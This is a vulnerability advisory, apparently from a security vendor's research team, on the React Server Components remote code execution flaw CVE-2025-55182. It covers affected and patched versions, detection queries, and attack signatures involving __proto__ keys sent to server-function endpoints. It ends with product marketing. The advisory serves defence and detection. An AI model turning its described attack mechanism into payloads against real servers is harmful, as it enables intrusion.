The vulnerability was discovered and reported by security researcher Lachlan Davidson on November 29, 2025, through Meta's Bug Bounty program. By November 30, Meta security researchers confirmed the issue, and the React team immediately began coordinating with affected hosting providers and open-source projects to roll out fixes before public disclosure.
The attack vector is unauthenticated and remote, requiring only a specially crafted HTTP request to achieve full remote code execution. Critically, the vulnerability exists in the default configuration of affected applications, meaning standard deployments are immediately exploitable without any misconfigurations.
Technical Details
The vulnerability resides in the react-server package and its handling of the RSC "Flight" protocol specifically in how React decodes payloads sent to React Server Function endpoints. The flaw is characterized as a logical insecure deserialization vulnerability where the server processes RSC payloads without proper validation.
React Server Functions allow clients to call functions on a server by translating client requests into HTTP requests that are forwarded to server-side endpoints. On the server, React deserializes these HTTP requests into function calls and returns data to the client. An attacker can craft a malicious, malformed payload that, when deserialized by React, fails structural validation checks. This allows attacker-controlled data to influence server-side execution logic, resulting in the execution of arbitrary JavaScript code with server privileges.
The vulnerability affects not just applications with explicit React Server Function endpoints, but any application that supports React Server Components. This broad attack surface is particularly concerning given that many developers may not realize their applications are vulnerable simply by using RSC features.
The fix, merged in pull request #35277, synchronizes the FlightReplyServer (client-to-server) implementation with improvements previously made to ReactFlightClient (server-to-client). These changes address deep resolution of cycles and deferred error handling issues that enabled the insecure deserialization path.
Affected Products and Exploitation
Vulnerable Versions:
React: 19.0, 19.1.0, 19.1.1, 19.2.0
Next.js: 14.3.0-canary, 15.0 through 15.5.6, 16.0 through 16.0.6
Any framework bundling react-server: Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodJS, Waku
Organizations should immediately review logs for exploitation attempts targeting React Server Function endpoints. Exploitation leverages prototype pollution in JSON payloads sent to common endpoints including /_next/server/endpoint (Next.js) and /react-server-function (generic RSC implementations).
Attack Signatures:
POST requests with JSON payloads containing __proto__, constructor, or prototype keys
Requests to server function endpoints with unusual, nested object structures
200 OK responses to malformed payloads that should have returned errors
Log Search Queries:
Web server logs: POST AND (/_next/server/ OR /react-server-function) AND __proto__
Application logs: Errors containing "prototype" or "constructor" during deserialization
Process logs: Unexpected child processes spawned by Node.js/web server
Post-Exploitation Indicators:
Unexpected outbound connections from web application servers
New files in web directories without corresponding deployments
Unusual process executions from Node.js processes
Lateral movement attempts from web server infrastructure
Organizations identifying these indicators should immediately initiate incident response procedures, including system isolation and comprehensive forensic analysis.
Recommendations
Organizations using React Server Components must take immediate action:
Immediate Actions:
Upgrade React to versions 19.0.1, 19.1.2, or 19.2.1 immediately. This is the only definitive mitigation.
Upgrade Next.js to patched versions (14.3.0-canary.88, 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7) based on your current version.
For other RSC-enabled frameworks (RedwoodJS, Waku, React Router, etc.), check official channels for updates and patch immediately.
Risk Assessment:
Audit all applications to identify those using React Server Components or Server Functions.
Review application deployment architecture to determine if WAF protections are in place.
If using Cloudflare, verify that Managed Rules are enabled (rule IDs 33aa8a8a948b48b28d40450c5fb92fba for Managed Ruleset, 2b5d06e34a814a889bee9a0699702280 for Free Ruleset).
Detection and Monitoring:
Deploy real-time monitoring for POST requests to React Server Function endpoints (/_next/server/endpoint, /react-server-function, and any custom server action routes).
Implement content inspection for JSON payloads containing __proto__, constructor, or prototype keys in requests to server function endpoints.
Enable comprehensive logging for all web application traffic, including request payloads where feasible, with specific attention to Content-Type: application/json requests.
Implement alerting for server-side errors, unusual code execution patterns, and unexpected outbound connections from web processes.
Review historical web server logs for POST requests to server function endpoints that may indicate reconnaissance or exploitation attempts prior to patching.
Establish baseline behavior for legitimate server function usage to identify anomalous request patterns.
Response Planning:
Prepare incident response procedures for potential exploitation, including forensic log collection and system isolation steps.
Review code execution context for all React Server Functions to understand potential impact of successful RCE.
Consider temporary network segmentation for vulnerable applications that cannot be immediately patched.
Conclusion
CVE-2025-55182 represents a critical vulnerability in one of the most widely deployed web frameworks in the modern JavaScript ecosystem. With a CVSS score of 10.0, unauthenticated remote code execution, and a default-vulnerable configuration, this flaw demands immediate attention from every organization running React Server Components.
Security teams must recognize that modern web frameworks, while enabling rapid development, introduce complex server-side execution contexts that expand the attack surface significantly. React Server Components blur the line between client and server, and vulnerabilities in this boundary represent critical risks.
Organizations should treat this disclosure as a forcing function to audit their entire application stack for similar server-side deserialization vulnerabilities. The patterns that enabled this React vulnerability, insufficient validation of client-controlled data, complex deserialization logic, and privileged execution contexts exist across many frameworks and custom application code. Comprehensive logging, real-time monitoring, and detection rules tuned to identify deserialization attacks must become standard practice.
Abstract Security Threat Research Organization (ASTRO)
Download the 2025 Security Data Pipeline Platforms Market Guide
This essential report provides a deep dive into the latest trends, key players, and technology innovations shaping the security data pipeline landscape.
Put your team’s focus back on catching attackers and let Abstract handle the heavy lifting of security data management. Our real-time streaming approach gives teams the breathing room to prioritize their security effectiveness instead.
Stop attacks in progress, not after the fact: Reduce Mean Time to Detect threats from hours to seconds with Abstract. Identify lateral movement, privilege escalation, and data exfiltration within the critical 43-minute adversary breakout window.
Send only high-fidelity alerts, not raw telemetry: Dramatically reduce ingestion volumes and licensing costs by processing detection logic in the stream.
With Abstract, you can enrich events in real time using GeoIP, threat feeds, identity, vulnerability, asset data, and user context - giving every signal the depth needed for faster, smarter detection.
Extend your detection surface beyond infrastructure and into the SaaS layer. Most tools stop at cloud infrastructure—Abstract goes further. It captures rich security telemetry from SaaS platforms like Google Workspace, Microsoft 365, Salesforce, GitHub, and Slack.
Abstract unifies security data across cloud, SaaS, and on-prem sources—eliminating blind spots caused by fragmented tools, missing logs, and delayed detection. See everything, in real time, from a single pipeline.
Abstract unifies security data across cloud, SaaS, and on-prem sources—eliminating blind spots caused by fragmented tools, missing logs, and delayed detection. See everything, in real time, from a single pipeline.
Streamline audit trails across all systems: Automatically enrich and correlate compliance-relevant events, making audits faster and more accurate.
Testimonials
“Time is our most valuable resource. Abstract gives us time back — in deployment, in operations, in impact.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
“This isn’t just another tool — it’s a true force multiplier. Abstract has helped us rethink how we approach security operations, allowing us to be proactive rather than reactive.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
“Abstract Security has completely redefined security platforms.”
Jonathan Kovacs
CEO, OmegaBlack
“There had been multiple attempts to build visibility into our systems. What we inherited was outdated, overlapping, and broken logging infrastructure.”
Pablo Quiros,
VP & Global Head of Security and Information Technology - CISO, Juul Labs
One Platform For All Your Security Data Operations